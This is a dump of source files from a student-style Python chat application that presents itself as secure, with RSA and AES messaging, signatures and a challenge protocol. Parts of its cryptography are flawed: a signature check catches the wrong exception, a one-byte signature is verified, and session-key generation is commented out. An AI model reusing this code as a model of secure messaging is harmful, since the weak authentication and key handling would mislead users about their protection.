used_file.write(str(self.last_secret_hash))\n print(self.last_secret_hash)\n self.forward_msg(msg, msg_source)\n\n def response_challenge(self, msg, msg_source):\n print('Responding to challenge message...', msg)\n print(msg[2:-MSG_SIGNATURE_SIZE])\n msg_type = str(int(MsgType.CHALLENGE)).encode('ascii')\n cipher_rsa = PKCS1_OAEP.new(user.get_private_key(SERVER_ADDR.decode()))\n unencrypted_data = cipher_rsa.decrypt(msg[2:-MSG_SIGNATURE_SIZE])\n unencrypted_nonce = unencrypted_data[:16]\n msg_hash_to_verify = unencrypted_data[16:]\n if msg_hash_to_verify != self.last_secret_hash:\n print('Somebody\\'s prolly trying to force an old key!')\n self.send_msg(msg, msg_source) # Send junk message that will fail\n\n cipher_rsa_usr = PKCS1_OAEP.new(user.getPublicKey(msg_source.decode()))\n reencrypted_data = cipher_rsa_usr.encrypt(unencrypted_nonce)\n msg = msg_type + SERVER_ADDR + reencrypted_data\n hash = SHA256.new(msg)\n sig = self.dig_signer.sign(hash)\n msg += sig\n self.send_msg(msg, msg_source)\n\n def forward_msg(self, msg, msg_source):\n print('Forwarding message from ', msg_source)\n try:\n dest_addresses = ''.join(\n [dest for dest in self.group_members if self.group_members[dest] and dest != msg_source.decode()]\n )\n self.send_msg(msg, dest_addresses)\n except:\n print('Client not found, message not forwarded? Client: ', self.group_members)\n\n\n def send_msg(self, msg, data_addresses):\n print('Sending message to ', data_addresses, '. 
Message: ', msg)\n # Below commented line if we want server wrapping messages with its own addr/sig combo\n #msg = self.format_msg(msg)\n\n data_addresses = data_addresses.decode() if type(data_addresses) == bytes else data_addresses\n self.netif.send_msg(data_addresses, msg)\n\n def format_msg(self, msg):\n msg = msg + SERVER_ADDR\n hash = SHA256.new(msg)\n signature = self.dig_signer.sign(hash)\n msg = msg + signature\n return msg\n\n def send_init(self, usr):\n# msg_type = bytes([MsgType.INIT])\n print('Received msg from', usr, 'Sending init...\\n')\n msg_type = str(int(MsgType.INIT)).encode('ascii')\n msg = self.format_msg(msg_type)\n self.send_msg(msg, usr)\n\ndef verify_signature(message, signature, key):\n h = SHA256.new(message)\n print(message, key)\n try:\n PKCS1_PSS.new(key).verify(h, signature)\n return True\n except SyntaxError:\n return False\n" }, { "alpha_fraction": 0.6980180740356445, "alphanum_fraction": 0.7074000239372253, "avg_line_length": 30.120437622070312, "blob_id": "743e0dc1c0ee1ad97c138d2317058c0178c3a340", "content_id": "0f150b28754eedb3f018539a428e35bf3d3433de", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8527, "license_type": "no_license", "max_line_length": 111, "num_lines": 274, "path": "/user.py", "repo_name": "enathang/SecureChatRoom", "src_encoding": "UTF-8", "text": "from Crypto.Random import get_random_bytes\nfrom Crypto.PublicKey import RSA\nfrom Crypto.Cipher import AES, PKCS1_OAEP\nfrom Crypto.Signature import PKCS1_PSS\nfrom Crypto.Hash import SHA256\nfrom chat_protocol import MsgType\nfrom pathlib import Path\nfrom netinterface import network_interface\n\nimport os\nimport json\nimport sys\nfrom base64 import b64decode, b64encode\n\nshared_secret = -1\nUSER_MODE = \"RSA\"\ncounter = 0\nglobal address\naddress = \"A\";\nglobal session_key\nsession_key = b''\n\nglobal private_key\nglobal public_key\nglobal _netif\n\ndef init_user(addr):\n global address\n global private_key\n global public_key\n global _netif\n address = addr\n public_key = getPublicKey(addr)\n private_key = get_private_key(addr)\n _netif = network_interface('./', address)\n\ndef sign(message, private_key):\n\th = SHA256.new(message)\n\tsignature = PKCS1_PSS.new(private_key).sign(h)\n\n\treturn signature\n\n\ndef encrypt_AES(message, key):\n\t#if(key == -1):\n\t#\tprint('Cannot encrypt text before shared secret is established.')\n\tcipher_aes = AES.new(key, AES.MODE_EAX)\n\tciphertext, tag = cipher_aes.encrypt_and_digest(message)\n\treturn ciphertext, cipher_aes.nonce, tag\n\n\ndef getPublicKey(address):\n\tkey_file = \"keys/\"+address+\"_pub.pem\"\n\twith open(key_file) as f:\n\t\tkey = RSA.import_key(f.read())\n\n\treturn key\n\ndef get_private_key(address):\n\tkey_file = \"keys/\"+address+\"_priv.pem\"\n\twith open(key_file) as f:\n\t\tkey = RSA.import_key(f.read())\n\treturn key\n\ndef decrypt_AES(message, key):\n\t#if(key == -1):\n\t#\tprint('Cannot encrypt text before shared secret is established.')\n\ttag = message[-16:]\n\tmsg_nonce = message[-32:-16]\n\tciphertext = message[:-32]\n\tprint('tag: ', tag, '\\nnonce: ', msg_nonce, '\\nciphertext: ', ciphertext)\n\tcipher_aes = AES.new(key, AES.MODE_EAX, msg_nonce)\n\tplaintext = cipher_aes.decrypt_and_verify(ciphertext, tag)\n\treturn plaintext\n\n\ndef generateSharedSecretDict(user_list):\n secrets_dict = dict()\n\n for usr in user_list:\n with open('./keys/' + usr +'_pub.pem', 'r') as usr_kfile:\n usr_kstr = usr_kfile.read()\n user_key = RSA.import_key(usr_kstr)\n 
cipher_rsa = PKCS1_OAEP.new(user_key)\n enc_session_key = cipher_rsa.encrypt(session_key)\n secrets_dict[usr] = b64encode(enc_session_key).decode('ascii')\n return secrets_dict\n\n\ndef generateSharedSecretString(user_list):\n\tbyte_str = b\"\"\n\n\tfor usr in user_list:\n\t\twith open('./keys/' + usr +'_pub.pem', 'r') as usr_kfile:\n\t\t\tusr_kstr = usr_kfile.read()\n\t\t\tuser_key = RSA.import_key(usr_kstr)\n\t\t\tcipher_rsa = PKCS1_OAEP.new(user_key)\n\t\t\tenc_session_key = cipher_rsa.encrypt(session_key)\n\t\t\tbyte_str += enc_session_key\n\treturn byte_str\n\n\ndef verifySignature(message, signature, key):\n\th = SHA256.new(message)\n\ttry:\n\t PKCS1_PSS.new(key).verify(h, signature)\n\t #print \"The signature is valid.\"\n\t return True\n\texcept (ValueError, TypeError):\n\t \t#print \"The signature is not valid.\"\n\t \treturn False\n\n\ndef parseSharedSecretString(msg):\n\tglobal session_key\n\tuser_order = msg[0:5].decode('ascii')\n\tuser_index = user_order.index(address)\n\n\tenc_session_key = msg[5+user_index*256:5+(user_index+1)*256]\n\tcipher_rsa = PKCS1_OAEP.new(private_key)\n\tsession_key = cipher_rsa.decrypt(enc_session_key)\n\treturn session_key\n\n\ndef parseSharedSecretDict(secrets_dict):\n\tenc_session_key = b64decode(secrets_dict[address].encode('ascii'))\n\tcipher_rsa = PKCS1_OAEP.new(private_key)\n\tsession_key = cipher_rsa.decrypt(enc_session_key)\n\treturn session_key\n\n\ndef establishSharedSecret(users_list):\n print('establishin...')\n global session_key\n #session_key = get_random_bytes(16)\n secret_dictionary = generateSharedSecretDict(users_list)\n print(secret_dictionary)\n json_secret_dictionary = b64encode(json.dumps(secret_dictionary).encode('ascii'))\n\n return session_key, json_secret_dictionary\n\ndef establishSharedSecretString(user_list):\n print('establishin...')\n global session_key\n session_key = get_random_bytes(16)\n secret_string = generateSharedSecretString(user_list)\n user_list_bytes = user_list.encode('ascii')\n\n return session_key, user_list_bytes+secret_string\n\n\ndef parseNewSecretMessage(msg_content):\n if verify_message_freshness(msg_content):\n print('verified correctly.')\n shared_secret = parseSharedSecretString(msg_content[2:-signature_length])\n\ndef parseTextMessage(msg_content):\n\tmsg_body = msg_content[2:-signature_length]\n\tplaintext = decrypt_AES(msg_body, session_key)\n\treturn plaintext.decode('ascii')\n\n''' HIGH LEVEL API '''\nsignature_length = 256\ndef receiveAndParseMessage(message): # Make this just a fixed thing\n\tprint('Received and parsing message: ', message)\n\tmsg_type = int(message[0:1].decode('ascii'))\n\tmsg_address = message[1:2].decode('ascii')\n\tsignature = message[-signature_length:]\n\tmsg_public_key = getPublicKey(msg_address)\n\n\tisValidSignature = verifySignature(message[0:-signature_length], signature, msg_public_key) # shoud be address\n\tif (not isValidSignature):\n\t\tprint (\"Is not valid signature\")\n\t\treturn -1, b\"\"\n\n\tret = \"\"\n\tif (msg_type == MsgType.JOIN): # Join message\n\t\tprint (\"Message type JOIN\")\n\t\t# Do nothing because the client should never receive this type of message\n\telif (msg_type == MsgType.INIT): # Init message\n\t\tprint (\"Message type INIT\")\n\t\tret = generateSharedSecretDictMessage() # Return a message of shared secret dict\n\telif (msg_type == MsgType.SECRET): # New shared secret message\n\t\tprint (\"Message type SECRET\")\n\t\tret = parseNewSecretMessage(message)\n\telif (msg_type == MsgType.LEAVE): # Leave message\n\t\tprint (\"Message type 
LEAVE\")\n\t\t# Do nothing because the client should never receive this type of message\n\telif (msg_type == MsgType.MSG): # Encrypted text message\n\t\tprint (\"Message type MSG\")\n\t\tret = parseTextMessage(message) # Return plaintext\n\telse:\n\t\tprint (\"Unrecognized message type: \" + str(msg_type))\n\t\treturn -1, \"\"\n\n\treturn msg_type, ret\n\ndef generateJoinMessage():\n\tmsg_type = str(int(MsgType.JOIN)).encode('ascii')\n\tsent_from = address.encode('ascii')\n\tmessage = msg_type + sent_from\n\n\tsignature = sign(message, private_key)\n\treturn message + signature\n\n\n\ndef verify_message_freshness(test_msg):\n print('verifyin secret freshness')\n msg, nonce = generateChallengeMessage(test_msg)\n _netif.send_msg('S', msg)\n\n # Drop racey messages\n status, response = _netif.receive_msg(blocking=True)\n while(response[0] != ord(str(int(MsgType.CHALLENGE)).encode('ascii'))):\n status, response = _netif.receive_msg(blocking=True)\n return challenge_response_verify(response, nonce)\n\ndef generateChallengeMessage(msg):\n print('generatin challenge message')\n hash = SHA256.new(msg).digest()\n\n msg_type = str(int(MsgType.CHALLENGE)).encode('ascii')\n sent_from = address.encode('ascii')\n nonce = get_random_bytes(16)\n\n cipher = PKCS1_OAEP.new(getPublicKey('S'))\n message_body = cipher.encrypt(nonce+hash)\n message = str(int(MsgType.CHALLENGE)).encode('ascii') + address.encode('ascii') + message_body\n signature = sign(message, private_key)\n return message + signature, nonce\n\ndef challenge_response_verify(message, expected_nonce):\n print('verifyin challenge response')\n if verifySignature(message[:-signature_length], message[-signature_length], getPublicKey('S')):\n msg_body = message[2:-256]\n cipher = PKCS1_OAEP.new(private_key)\n plaintext = cipher.decrypt(msg_body)\n if(plaintext == expected_nonce):\n return True\n return False\n\ndef generateSharedSecretDictMessage():\n\tmsg_type = str(int(MsgType.SECRET)).encode('ascii')\n\tsent_from = address.encode('ascii')\n\tsecret, string = establishSharedSecretString('ABCDE') # Note dict is sent unencrypted\n\tmessage = msg_type + sent_from + string\n\n\tsignature = sign(message, private_key)\n\n\treturn message + signature\n\n\ndef generateLeaveMessage():\n\tmsg_type = str(int(MsgType.LEAVE)).encode('ascii')\n\tsent_from = address.encode('ascii')\n\tmessage = msg_type + sent_from\n\n\tsignature = sign(message, private_key)\n\n\treturn message + signature\n\n\ndef generateTextMessage(plaintext):\n\tplaintext = plaintext.encode('ascii') if not type(plaintext) == bytes else plaintext\n\tmsg_type = str(int(MsgType.MSG)).encode('ascii')\n\tsent_from = address.encode('ascii')\n\tciphertext, msg_nonce, tag = encrypt_AES(plaintext, session_key)\n\tmsg_body = ciphertext + msg_nonce + tag\n\tmessage = msg_type + sent_from + msg_body\n\n\tsignature = sign(message, private_key)\n\tprint('Sending message: \\n', message+signature)\n\treturn message + signature\n" }, { "alpha_fraction": 0.6398210525512695, "alphanum_fraction": 0.6517524123191833, "avg_line_length": 24.788461685180664, "blob_id": "97f1e1687c1cf90fa1a348e8d7a4a4699382f028", "content_id": "01ffc9677206131186b29d04bfeb015eb3c9603b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1341, "license_type": "no_license", "max_line_length": 97, "num_lines": 52, "path": "/server.py", "repo_name": "enathang/SecureChatRoom", "src_encoding": "UTF-8", "text": "#server\nimport os, sys, getopt, time\nfrom netinterface import 
network_interface\nfrom Crypto.Random import get_random_bytes\nfrom Crypto.PublicKey import RSA\nfrom Crypto.Cipher import AES, PKCS1_OAEP\nfrom Crypto.Signature import pkcs1_15\nfrom Crypto.Hash import SHA256\n\nfrom server_func import Server\n\nNET_PATH = './'\nOWN_ADDR = 'S'\nGROUP_ADDRESSES = b'ABCDE'\n\n# ------------\n# main program\n# ------------\n\ntry:\n\topts, args = getopt.getopt(sys.argv[1:], shortopts='hp:a:', longopts=['help', 'path=', 'addr='])\nexcept getopt.GetoptError:\n\tprint('Usage: python server.py -p <network path> -a <own addr> ')\n\tsys.exit(1)\n\nfor opt, arg in opts:\n\tif opt == '-h' or opt == '--help':\n\t\tprint('Usage: python server.py -p <network path> -a <own addr> ')\n\t\tsys.exit(0)\n\telif opt == '-p' or opt == '--path':\n\t\tNET_PATH = arg\n\telif opt == '-a' or opt == '--addr':\n\t\tOWN_ADDR = arg\n\nif (NET_PATH[-1] != '/') and (NET_PATH[-1] != '\\\\'): NET_PATH += '/'\n\nif not os.access(NET_PATH, os.F_OK):\n\tprint('Error: Cannot access path ' + NET_PATH)\n\tsys.exit(1)\n\nif len(OWN_ADDR) > 1: OWN_ADDR = OWN_ADDR[0]\n\nif OWN_ADDR not in network_interface.addr_space:\n\tprint('Error: Invalid address ' + OWN_ADDR)\n\tsys.exit(1)\n\n# main loop\nnetif = network_interface(NET_PATH, OWN_ADDR)\n\nchat_server = Server(netif, 'group_members.acl', './keys/S_priv.pem')\n\nchat_server.listen()\n" }, { "alpha_fraction": 0.540229856967926, "alphanum_fraction": 0.5823754668235779, "avg_line_length": 19.076923370361328, "blob_id": "192d68ad95d9622efb823281da5b740e19217088", "content_id": "715472831e1f3299727c16b193994fe3357564d4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 261, "license_type": "no_license", "max_line_length": 39, "num_lines": 13, "path": "/chat_protocol.py", "repo_name": "enathang/SecureChatRoom", "src_encoding": "UTF-8", "text": "from enum import IntEnum\n\n# Size of message components (in bytes)\nMSG_TYPE_SIZE = 1\nMSG_SOURCE_SIZE = 1\nMSG_SIGNATURE_SIZE = 256\nclass MsgType(IntEnum):\n JOIN = 0\n INIT = 1\n LEAVE = 2\n MSG = 3\n SECRET = 4\n CHALLENGE = 5\n" }, { "alpha_fraction": 0.8007246255874634, "alphanum_fraction": 0.8007246255874634, "avg_line_length": 54.20000076293945, "blob_id": "66e667688cb2039ed9b368621a7b3172cab70e6c", "content_id": "a389634504450ca34a876ef9d310a00b9c3c659d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 276, "license_type": "no_license", "max_line_length": 228, "num_lines": 5, "path": "/README.md", "repo_name": "enathang/SecureChatRoom", "src_encoding": "UTF-8", "text": "# CsipCseppCsatApp\n\n## Ben Gafford, Nathan Gifford, Tristan Winquist\n\nCsipCseppCsatApp is a secure chat application that runs on network.py and netinterface.py. Uses PyCryptodome for cryptographic primitives and tkinter for the gui. 
Chat protocol designed to protect against common attacker models.\n" }, { "alpha_fraction": 0.6843311190605164, "alphanum_fraction": 0.6914924383163452, "avg_line_length": 23.58450698852539, "blob_id": "4343dc87f5f10ac1d65a1a564a3077f96c2c9ef9", "content_id": "360e5dbdf983e59947706efd5d7df20eab839982", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3491, "license_type": "no_license", "max_line_length": 97, "num_lines": 142, "path": "/client_interface.py", "repo_name": "enathang/SecureChatRoom", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n#interface_functions.py\n\nimport os, sys, getopt, time\nfrom netinterface import network_interface\n\nfrom Crypto.Random import get_random_bytes\nfrom Crypto.PublicKey import RSA\nfrom Crypto.Cipher import AES, PKCS1_OAEP\nfrom Crypto.Signature import pkcs1_15\nfrom Crypto.Signature import PKCS1_PSS\nfrom Crypto.Hash import SHA256\nfrom enum import Enum\n\nfrom chat_protocol import MsgType\nimport chat_protocol\n\n\nimport user\n\nimport tkinter\nfrom threading import Thread\n\nNET_PATH = './'\nOWN_ADDR = 'A'\nSERVER = 'S'\n\n# ------------\n# main program\n# ------------\n\ntry:\n\topts, args = getopt.getopt(sys.argv[1:], shortopts='hp:a:', longopts=['help', 'path=', 'addr='])\nexcept getopt.GetoptError:\n\tprint('Usage: python client_interface.py -p <network path> -a <own addr>')\n\tsys.exit(1)\n\nfor opt, arg in opts:\n\tif opt == '-h' or opt == '--help':\n\t\tprint('Usage: python client_interface.py -p <network path> -a <own addr>')\n\t\tsys.exit(0)\n\telif opt == '-p' or opt == '--path':\n\t\tNET_PATH = arg\n\telif opt == '-a' or opt == '--addr':\n\t\tOWN_ADDR = arg\n\nif (NET_PATH[-1] != '/') and (NET_PATH[-1] != '\\\\'): NET_PATH += '/'\n\nif not os.access(NET_PATH, os.F_OK):\n\tprint('Error: Cannot access path ' + NET_PATH)\n\tsys.exit(1)\n\nif len(OWN_ADDR) > 1: OWN_ADDR = OWN_ADDR[0]\n\nif OWN_ADDR not in network_interface.addr_space:\n\tprint('Error: Invalid address ' + OWN_ADDR)\n\tsys.exit(1)\n\nuser.init_user(OWN_ADDR)\n\n\n# start main loop\nnetif = network_interface(NET_PATH, OWN_ADDR)\n\n\n## send join, recieve init, and generate new secret\njoin_msg = user.generateJoinMessage()\nnetif.send_msg('S', join_msg)\nstatus, respond_msg = netif.receive_msg(blocking=True)\nif not status:\n\tprint('no response from the server, exiting')\n\tquit()\nelif status:\n\tmsg_type, msg = user.receiveAndParseMessage(respond_msg)\n\tnetif.send_msg('S', msg)\nprint('join protocol finished')\n\n\n\n\n## gui\ndef gui_send(event = None):\n\n\tmsg_list.insert(tkinter.END, 'you: ' + my_msg.get())\n\tplain_msg = my_msg.get()\n\tenc_msg = user.generateTextMessage(plain_msg)\n\tmy_msg.set('')\n\t## send actually send a message.\n\tnetif.send_msg('S', enc_msg)\n\n\n\ndef gui_recieve():\n\twhile True:\n\t\tstatus, msg = netif.receive_msg(blocking=True)\n\t\tmsg_type, parsed_msg = user.receiveAndParseMessage(msg)\n\t\tif msg_type == '1':\n \t\t\tnetif.send_msg('S', parsed_msg)\n\t\telse:#\n\t\t\tif msg_type == '2':\n\t\t\t\treturn\n\t\t\ttext_msg = parsed_msg\n\t\t\tif msg and text_msg:\n\t\t\t\t\tmsg = msg if type(type) != bytes else msg.decode()\n\t\t\t\t\ttext_msg = text_msg if type(text_msg) != bytes else text_msg.decode()\n\t\t\t\t\tmsg_list.insert(tkinter.END, chr(msg[1]) + ': ' + text_msg)\n\n\ndef on_closing(event=None):\n\tnetif.send_msg('S', user.generateLeaveMessage())\n\ttop.quit()\n\ttop.destroy()\n\tprint('disconnected from server')\n\tquit()\n\n\ntop = 
tkinter.Tk()\ntop.title('CsippCseppCsatApp')\n\nmessages_frame = tkinter.Frame(top)\nmy_msg = tkinter.StringVar()\nscrollbar = tkinter.Scrollbar(messages_frame)\n\nmsg_list = tkinter.Listbox(messages_frame, height=15, width=50, yscrollcommand=scrollbar.set)\nscrollbar.pack(side=tkinter.RIGHT, fill=tkinter.Y)\nmsg_list.pack(side=tkinter.LEFT, fill=tkinter.BOTH)\nmsg_list.pack()\n\nmessages_frame.pack()\n\nentry_field = tkinter.Entry(top, textvariable=my_msg)\nentry_field.bind(\"<Return>\", gui_send)\nentry_field.pack()\nsend_button = tkinter.Button(top, text=\"Send\", command=gui_send)\nsend_button.pack()\n\ntop.protocol(\"WM_DELETE_WINDOW\", on_closing)\n\nreceive_thread = Thread(target=gui_recieve)\nreceive_thread.start()\n\ntkinter.mainloop() # Starts GUI execution.\n" } ]
8
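Across the SecureChatRoom record above, every message is framed as one ASCII type byte, a one-byte sender address, a body, and a trailing 256-byte RSA-PSS signature over everything before it (MSG_SIGNATURE_SIZE). A standalone sketch of that framing with a throwaway key rather than the project's key files; the body content is invented:

from Crypto.PublicKey import RSA
from Crypto.Signature import PKCS1_PSS
from Crypto.Hash import SHA256

key = RSA.generate(2048)                         # 2048-bit key -> 256-byte signature
msg = b'3' + b'A' + b'ciphertext would go here'  # MsgType.MSG, sender 'A', body
framed = msg + PKCS1_PSS.new(key).sign(SHA256.new(msg))

# Receiver side: split off the trailing 256 bytes and verify before parsing.
body, signature = framed[:-256], framed[-256:]
try:
    PKCS1_PSS.new(key.publickey()).verify(SHA256.new(body), signature)
    print('signature valid')
except (ValueError, TypeError):
    print('signature invalid')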
riddler/uxid-py
https://github.com/riddler/uxid-py
76492262e118e89792c4b2f68df8e7c650cd2df2
051089cfa8f46c68c427e1602c6e71c212260078
4d854f77ced99aea51c06f7bf4fd9f3e4cf97291
refs/heads/main
2023-01-30T17:37:26.681707
2020-11-30T19:27:20
2020-11-30T19:27:20
317,321,563
0
0
NOASSERTION
2020-11-30T19:14:12
2020-11-30T19:14:37
2020-11-30T19:27:21
Python
[ { "alpha_fraction": 0.8181818127632141, "alphanum_fraction": 0.8181818127632141, "avg_line_length": 13.666666984558105, "blob_id": "352739b5b452b646982f18f0f1fac10d5c01c1b9", "content_id": "c21104866f9a8a2aad5c3ada393cf65aa22ed08d", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 44, "license_type": "permissive", "max_line_length": 35, "num_lines": 3, "path": "/README.md", "repo_name": "riddler/uxid-py", "src_encoding": "UTF-8", "text": "# UXID\n\nUser Experience focused Identifiers\n" }, { "alpha_fraction": 0.5839999914169312, "alphanum_fraction": 0.6000000238418579, "avg_line_length": 14.625, "blob_id": "db242c6ae3490f3f3a96994afed422a197bb0b60", "content_id": "5ef4fa3fe9ba437f03e26dae4c2da255f0b50606", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 250, "license_type": "permissive", "max_line_length": 47, "num_lines": 16, "path": "/uxid/__init__.py", "repo_name": "riddler/uxid-py", "src_encoding": "UTF-8", "text": "\"\"\"\n uxid\n ~~~~\n\n User Experience focused Identifier\n\n :copyright: (c) 2020 JohnnyT.\n :license: MIT, see LICENSE for more details\n\"\"\"\nfrom . import api, uxid\n\ndecode = api.decode\n\nUXID = uxid.UXID\n\n__all__ = api.__all__ + uxid.__all__\n" }, { "alpha_fraction": 0.5905923247337341, "alphanum_fraction": 0.6132404208183289, "avg_line_length": 21.076923370361328, "blob_id": "09e9d9b46bd91b8a73145a75528eace60caebb25", "content_id": "e9da1085a10bcae43c8bea52ff934e9c67d8092f", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 574, "license_type": "permissive", "max_line_length": 98, "num_lines": 26, "path": "/uxid/api.py", "repo_name": "riddler/uxid-py", "src_encoding": "UTF-8", "text": "\"\"\"\n uxid/api\n ~~~~~~~~\n\n Public API of the UXID package.\n\"\"\"\nimport re\n\nfrom . 
import uxid\n\n__all__ = ['decode']\n\nCROCKFORD_ENCODING = \"0123456789ABCDEFGHJKMNPQRSTVWXYZ\"\nINVALID_REGEX = re.compile(\"[^%s]\" % CROCKFORD_ENCODING)\n\n\ndef decode(string):\n    if isinstance(string, str):\n        len_value = len(string)\n\n        if len_value == 0:\n            raise ValueError('input is required')\n        if INVALID_REGEX.search(string):\n            raise ValueError('expected input to be a Base32 encoded string, got: \\'%s\\'' % string)\n\n    return uxid.UXID(string)\n" }, { "alpha_fraction": 0.5581717491149902, "alphanum_fraction": 0.5817174315452576, "avg_line_length": 23.29032325744629, "blob_id": "bd0586759ff9da33b956f10b2a106f907e27d855", "content_id": "fc32d46869c55b1c9bc8500e711e7939a65eff77", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 722, "license_type": "permissive", "max_line_length": 59, "num_lines": 31, "path": "/uxid/uxid.py", "repo_name": "riddler/uxid-py", "src_encoding": "UTF-8", "text": "\"\"\"\n    uxid/uxid\n    ~~~~~~~~~\n\n    Object representation of a UXID.\n\"\"\"\nimport math\n\n__all__ = ['UXID']\n\nCROCKFORD_ENCODING = '0123456789ABCDEFGHJKMNPQRSTVWXYZ'\nTIME_LEN = 10\n\nclass UXID(object):\n    __slots__ = ['encoded', 'time']\n\n    def __init__(self, encoded):\n        self.encoded = encoded\n        self.decode_time()\n\n    def decode_time(self):\n        decoded_time = 0\n        time_chars = self.encoded[0:TIME_LEN][::-1]\n\n        for power_index in range(TIME_LEN):\n            char = time_chars[power_index]\n            power_value = math.pow(32, power_index)\n            alphabet_index = CROCKFORD_ENCODING.index(char)\n            decoded_time += power_value * alphabet_index\n\n        self.time = decoded_time\n" } ]
4
mykaminskaya/DBMS-project
https://github.com/mykaminskaya/DBMS-project
12c550128c9e5ac7bb3062eb1d30665034b4730f
c1f00fca388d7f75d382f3a437f0a3e7164802fd
0f4baf8ba1e7feb51ec847459761621445affd0a
refs/heads/master
2023-02-01T23:56:47.180939
2020-12-21T11:29:29
2020-12-21T11:29:29
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.8235294222831726, "alphanum_fraction": 0.8235294222831726, "avg_line_length": 21.66666603088379, "blob_id": "18db1299a2938693cf71406f9bab399d350a9eb7", "content_id": "e4c721821c5dc7459b265c4a552fe7a19f44072a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 113, "license_type": "no_license", "max_line_length": 51, "num_lines": 3, "path": "/README.md", "repo_name": "mykaminskaya/DBMS-project", "src_encoding": "UTF-8", "text": "# DBMS-project\n\nОписывается модель работы интернет магазина одежды.\n" }, { "alpha_fraction": 0.7224669456481934, "alphanum_fraction": 0.7236683964729309, "avg_line_length": 25.849462509155273, "blob_id": "260751ef513ae4998653ee7c0eb177cf056b241f", "content_id": "ad38f665d6572f50a859988cdb91dabfcf14b403", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "SQL", "length_bytes": 2533, "license_type": "no_license", "max_line_length": 139, "num_lines": 93, "path": "/procedures.ddl", "repo_name": "mykaminskaya/DBMS-project", "src_encoding": "UTF-8", "text": "IF OBJECT_ID('GetClientPurchases', 'P') IS NOT NULL\n DROP PROC GetClientPurchases;\n\nGO\n\nCREATE PROCEDURE GetClientPurchases @id_client INT\nAS \nBEGIN\n SELECT order.id_order, product.id_product, product.product_type, product.price\n FROM order\n JOIN product_order ON order.id_order = product_order.id_order\n JOIN product ON product_order.id_product = product.id_product\n WHERE order.id_client = @id_client\nEND;\nGO\n\n\nIF OBJECT_ID('GetCourierTimetable', 'P') IS NOT NULL\n DROP PROC GetCourierTimetable;\n\nGO\n\nCREATE PROCEDURE GetCourierTimetable @id_courier INT, @delivery_time_start DATETIME, @delivery_time_end DATETIME\nAS \nBEGIN\n SELECT parcel.delivery_time_start, parcel.delivery_time_end, parcel.id_parcel, parcel.delivery_type, parcel.address, client.client_name\n FROM parcel\n JOIN order ON parcel.id_order = order.id_order\n JOIN client ON order.id_client = client.id_client\n WHERE parcel.id_courier = @id_courier AND parcel.delivery_time_start < @delivery_time_end\n AND parcel.delivery_time_end > @delivery_time_start\n ORDER BY parcel.delivery_time_start\nEND;\nGO\n\n\nIF OBJECT_ID('GetOrderSummary', 'P') IS NOT NULL\n DROP PROC GetOrderSummary;\n\nGO\n\nCREATE PROCEDURE GetOrderSummary @id_order INT\nAS \nBEGIN\n SELECT order.id_order, order.sum, order.discount, client.id_client, client.name, client.phone_number\n FROM order\n JOIN client ON order.id_client = client.id_client\n WHERE order.id_order = @id_order\nEND;\nGO\n\n\nIF OBJECT_ID('GetOrderParcels', 'P') IS NOT NULL\n DROP PROC GetOrderParcels;\n\nGO\n\nCREATE PROCEDURE GetOrderParcels @id_order INT\nAS \nBEGIN\n SELECT id_parcel, payment_type, delivery_type, delivery_time_start, delivery_time_end, address, id_courier, id_storage\n FROM parcel\n WHERE parcel.id_order = @id_order\nEND;\nGO\n\n\nCREATE TABLE History_Products (\n id_operation INT PRIMARY KEY,\n id_product INT,\n operation VARCHAR(200),\n operation_time DATETIME DEFAULT GETDATE(),\n);\nGO\n\nCREATE TRIGGER Product_INSERT ON product\nAFTER INSERT\nAS\nBEGIN\n INSERT INTO History_Products(id_product, operation)\n SELECT id_operation, 'Добавлен товар ' + product.product_type + 'бренда' + product.brand\n FROM INSERTED\nEND;\nGO\n\nCREATE TRIGGER Product_DELETE ON product\nAFTER DELETE\nAS\nBEGIN\n INSERT INTO History_Products(id_product, operation)\n SELECT id_operation, 'Удален товар ' + product.product_type + 'бренда' + product.brand\n FROM DELETED\nEND;\n" }, { 
"alpha_fraction": 0.5828326344490051, "alphanum_fraction": 0.5944206118583679, "avg_line_length": 45.29138946533203, "blob_id": "59563cef6d5cf41ed9507584f3303d43a0ce03e5", "content_id": "838d027a3ae879daf16b67dccf8f491a28ed386f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7973, "license_type": "no_license", "max_line_length": 124, "num_lines": 151, "path": "/tgbot.py", "repo_name": "mykaminskaya/DBMS-project", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\nimport telebot\nimport config\nfrom telebot import types\nfrom data_handler import SQLiter\nfrom datetime import datetime\n\nbot = telebot.TeleBot(config.API_TOKEN)\n\nmarkup_menu = types.InlineKeyboardMarkup(row_width=1)\nbtn_client = types.InlineKeyboardButton('Просмотреть заказы клиента', callback_data='client')\nbtn_courier = types.InlineKeyboardButton('Узнать расписание курьера', callback_data='courier')\nbtn_delivery = types.InlineKeyboardButton('Получить информациию по заказу', callback_data='order')\nbtn_product = types.InlineKeyboardButton('Добавить товар в каталог', callback_data='add product')\nbtn_editorder = types.InlineKeyboardButton('Редактировать заказ', callback_data='edit order')\nmarkup_menu.add(btn_client, btn_courier, btn_delivery, btn_product, btn_editorder)\n\nmarkup_menu1 = types.InlineKeyboardMarkup()\nbtn_address = types.InlineKeyboardButton('Адрес доставки', callback_data='address')\nbtn_payment = types.InlineKeyboardButton('Способ оплаты', callback_data='payment')\nmarkup_menu1.add(btn_address, btn_payment)\n\n\[email protected]_handler(commands=['start', 'help'])\ndef send_welcome(message):\n bot.reply_to(message, 'Добро пожаловать! Выберете действие, которое хотите совершить: /start', 